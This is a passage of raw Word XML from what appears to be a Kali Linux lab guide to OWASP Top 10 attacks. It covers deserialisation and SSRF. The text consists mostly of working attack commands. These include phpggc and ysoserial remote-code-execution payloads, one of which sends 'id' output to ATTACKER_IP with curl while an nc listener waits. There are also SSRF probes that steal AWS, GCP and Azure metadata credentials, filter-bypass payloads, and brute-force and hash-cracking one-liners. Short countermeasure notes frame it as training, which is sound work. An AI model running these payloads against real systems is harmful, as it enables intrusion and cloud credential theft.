              <w:t xml:space="preserve">bash kali_lab/a08_integrity_failures.sh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Detecting Serialised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Detecting serialised objects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Detect Java serialisation magic bytes in cookies / responses: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Base64 of Java magic bytes 0xACED0005 = rO0AB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-I http://TARGET | grep -i 'set-cookie' | grep 'rO0AB'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Detect PHP serialisation patterns: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PHP serialized: O:4:"User":1:{s:4:"name";s:5:"admin";}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-I http://TARGET | grep -i 'set-cookie' | grep -P 'O:[0-9]+:'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Intercept and decode with Burp Suite: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Proxy &gt; HTTP History &gt; look for cookies containing rO0AB or O:N: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Decoder tab: Base64 decode, check for 0xACED binary prefix (Java)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Identify Python pickle data (binary, starts with opcode bytes):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http://TARGET/api/session | xxd | head -3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80 04 95 = Python pickle protocol 4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PHP Deserialization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PHP deserialization (phpggc)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phpggc — PHP Generic Gadget Chains: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git clone https://github.com/ambionics/phpggc.git /opt/phpggc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List available gadget chains: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/opt/phpggc/phpggc -l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/opt/phpggc/phpggc -l | grep -i 'Laravel\|Symfony\|WordPress\|Guzzle'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Generate RCE payload for Laravel (system command execution):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/opt/phpggc/phpggc Laravel/RCE1 system 'id &gt; /tmp/pwned'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Generate base64-encoded payload (for cookie injection):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/opt/phpggc/phpggc Laravel/RCE1 system 'id' | base64 -w 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Inject via cookie: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PAYLOAD=$(/opt/phpggc/phpggc Laravel/RCE1 system 'id' | base64 -w 0)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-b "laravel_session=$PAYLOAD" http://TARGET/profile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PHP manual object injection (escalate role):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-b "user_obj=O:4:\"User\":1:{s:4:\"role\";s:5:\"admin\";}"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http://TARGET/dashboard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Java Deserialization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Java deserialization (ysoserial)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ysoserial — Java Deserialization RCE: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wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar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-O /opt/ysoserial.jar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List available gadget chains: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java -jar /opt/ysoserial.jar --help 2&gt;&amp;1 | head -40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Generate CommonsCollections6 payload (curl RCE callback):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java -jar /opt/ysoserial.jar CommonsCollections6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'curl http://ATTACKER_IP:4444/?pwn=$(id)' &gt; /tmp/payload_cc6.bin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Base64-encode for sending in JSON/cookie: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java -jar /opt/ysoserial.jar CommonsCollections1 'id' | base64 -w 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Send binary payload to Java endpoint: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-X POST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-H 'Content-Type: application/x-java-serialized-object'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--data-binary @/tmp/payload_cc6.bin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http://TARGET/api/deserialize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Set up listener for callback (separate terminal):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nc -lvnp 4444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Countermeasures for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deserialise untrusted data; prefer JSON with schema validation over binary serialisation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PHP: never call unserialize() on user-supplied input; use json_decode() instead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Java: use SerialKiller or NotSoSerial agent to block known gadget chains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package integrity with checksums (sha256sum) before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and embed SRI hashes for all externally loaded scripts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A10:2021 — Server-Side Request Forgery (SSRF)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Increasing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network access / Cloud IAM key theft / RCE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E" w:sz="6"/>
              <w:left w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:bottom w:val="single" w:color="2C5F2E" w:sz="6"/>
              <w:right w:val="single" w:color="2C5F2E" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5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5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">▶  Lab Script: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a10_ssrf.sh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SSRF parameter discovery, internal network probing, AWS/GCP/Azure metadata theft, filter bypass payloads, OOB detection with interactsh</w:t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on Kali: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="2C5F2E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bash kali_lab/a10_ssrf.sh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SSRF Discovery — Finding Vulnerable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SSRF parameter discovery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Parameters commonly vulnerable to SSRF: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url, uri, link, src, source, path, dest, target, fetch, load,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resource, proxy, callback, webhook, endpoint, import, download,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host, from, to, image, preview, imageUrl, file, ref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 a parameter with an internal address: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"http://TARGET/api/fetch?url=http://127.0.0.1/admin"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"http://TARGET/preview?link=http://localhost:8080/actuator"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ffuf — fuzz parameters to find SSRF entry points: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ffuf -u "http://TARGET/api?FUZZ=http://127.0.0.1/"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-w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt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-mc 200 -fs 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Internal Network &amp; Cloud Metadata Probing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Cloud metadata SSRF attacks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Probe localhost services via SSRF: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SSRF="http://TARGET/api/fetch?url="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for addr in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'http://127.0.0.1/'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'http://127.0.0.1:8080/'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'http://127.0.0.1:6379/'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'http://127.0.0.1:9200/'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'http://127.0.0.1:2375/version'; do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echo -n "$addr → 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curl -s -o /dev/null -w '%{http_code} %{size_download}B\n' "${SSRF}${addr}"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done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AWS EC2 Metadata Service — steal IAM credentials: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(if the server runs on AWS and IMDSv1 is enabled)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"${SSRF}http://169.254.169.254/latest/meta-data/"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"${SSRF}http://169.254.169.254/latest/meta-data/iam/security-credentials/"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"${SSRF}http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME"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Response contains: AccessKeyId, SecretAccessKey, Token — full AWS access!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GCP Metadata Service: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-H 'Metadata-Flavor: Google'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"${SSRF}http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"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Azure Instance Metadata Service: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-H 'Metadata: true'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"${SSRF}http://169.254.169.254/metadata/instance?api-version=2021-02-01"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SSRF Filter Bypass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SSRF filter bypass techniques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Numeric representations of 127.0.0.1 (bypass string filters):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"${SSRF}http://2130706433/"        # decimal integer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"${SSRF}http://0x7f000001/"        # hexadecimal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"${SSRF}http://0177.0.0.1/"       # octal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"${SSRF}http://127.1/"             # shortened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"${SSRF}http://127.0.0.1.nip.io/" # DNS-based bypass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IPv6 representations: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"${SSRF}http://[::1]/"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"${SSRF}http://[0:0:0:0:0:ffff:7f00:0001]/"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"${SSRF}http://[::ffff:127.0.0.1]/"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URL parser inconsistencies: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"${SSRF}http://attacker.com@127.0.0.1/"   # @ trick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"${SSRF}http://127.0.0.1#.attacker.com/"  # fragment trick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"${SSRF}http://attacker.com?next=http://127.0.0.1/"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DNS rebinding (time-of-check bypass):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1. Register domain that first resolves to 8.8.8.8 (allowed)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2. After allowlist check, TTL expires and resolves to 127.0.0.1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Tool: https://lock.cmpxchg8b.com/rebinder.html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SSRFmap — automated SSRF exploitation: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git clone https://github.com/swisskyrepo/SSRFmap /opt/SSRFmap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Save raw Burp request to /tmp/req.txt, then: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python3 /opt/SSRFmap/ssrfmap.py -r /tmp/req.txt -p url -m portscan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 Out-of-Band SSRF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Out-of-band SSRF detection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interactsh — free OOB detection server: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Install: go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest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interactsh-client -v   # generates unique URL like abcdef.oast.pro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Then send SSRF payload with your interactsh URL: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curl -s "http://TARGET/api/fetch?url=http://abcdef.oast.pro/ssrf_test"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Check interactsh console for DNS/HTTP hit — confirms blind SSRF!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Burp Collaborator (if you have Burp Pro):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Burp &gt; Collaborator Client &gt; Copy to clipboard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Use the collaborator URL in your SSRF payload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Click 'Poll now' to see incoming connections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Simple Python listener for SSRF callback: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python3 -m http.server 8888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Use http://YOUR_KALI_IP:8888/ as SSRF target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Only works if target server can reach your Kali machine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 Countermeasures for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user-supplied URLs against a strict allowlist of permitted domains and protocols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DNS resolution, verify the resolved IP is not private (127.x, 10.x, 172.16-31.x, 192.168.x, 169.254.x)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HTTP redirects in fetch calls, or validate each redirect destination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AWS: enable IMDSv2 (requires PUT token) to make metadata SSRF harder to exploit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 dedicated egress proxy that enforces allowlist policies for all outbound HTTP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Reference — Kali Attack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 lookup of the most useful commands for each OWASP category.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880"/>
        <w:gridCol w:w="5220"/>
      </w:tblGrid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Quick Command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A01 Access Control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curl / jwt_tool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jwt_tool.py &lt;TOKEN&gt; -X a  (alg:none attack)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A01 Access Control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gobuster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gobuster dir -u $TARGET -w /usr/share/wordlists/dirb/common.txt -x php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A02 Crypto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openssl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openssl s_client -ssl3 -connect TARGET:443  (POODLE test)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A02 Crypto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hashcat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hashcat -m 0 -a 0 hashes.txt rockyou.txt --force  (MD5 crack)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A03 SQLi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sqlmap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sqlmap -u 'http://T/page?id=1' --batch --dbs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A03 XSS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dalfox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dalfox url 'http://TARGET/search?q=test'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A05 Misconfig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nikto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nikto -h http://TARGET -C all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A05 XXE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curl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curl -X POST -H 'Content-Type: application/xml' -d @xxe.xml TARGET/api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A06 Components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trivy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trivy image nginx:1.18 --severity HIGH,CRITICAL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A06 Components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whatweb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whatweb http://TARGET -v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A07 Auth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hydra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hydra -l admin -P rockyou.txt T http-post-form '/login:u=^USER^&amp;p=^PASS^:fail'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A07 Auth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john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john --format=raw-md5 --wordlist=rockyou.txt hashes.txt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A08 Deserial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phpggc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phpggc Laravel/RCE1 system 'id' | base64 -w 0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A08 Deserial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ysoserial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java -jar ysoserial.jar CommonsCollections6 'id' &gt; payload.bin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A10 SSRF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curl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curl 'http://T/fetch?url=http://169.254.169.254/latest/meta-data/'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A10 SSRF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5F2E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">interactsh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interactsh-client -v  (get OOB URL, inject into SSRF param)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(2021)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https://owasp.org/Top10/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Cheat Sheet Series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https://cheatsheetseries.owasp.org/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PortSwigger Web Security Academy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https://portswigger.net/web-security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HackTricks (attack techniques)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https://book.hacktricks.xyz/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PayloadsAllTheThings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https://github.com/swisskyrepo/PayloadsAllTheThings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SecLists (wordlists)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https://github.com/danielmiessler/SecLists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https://github.com/ticarpi/jwt_tool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https://sqlmap.org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interactsh (OOB)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https://github.com/projectdiscovery/interactsh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SSRFmap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https://github.com/swisskyrepo/SSRFmap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phpggc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https://github.com/ambionics/phpggc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ysoserial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https://github.com/frohoff/ysoserial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https://canarytokens.org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niebezpiecznik.pl (source)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https://niebezpiecznik.pl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Authorised Lab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Web Application Security — Kali Linux Attack Lab Guide</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	OWASP Top 10 (2021)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2026-03-15T22:46:54.942Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-15T22:46:54.943Z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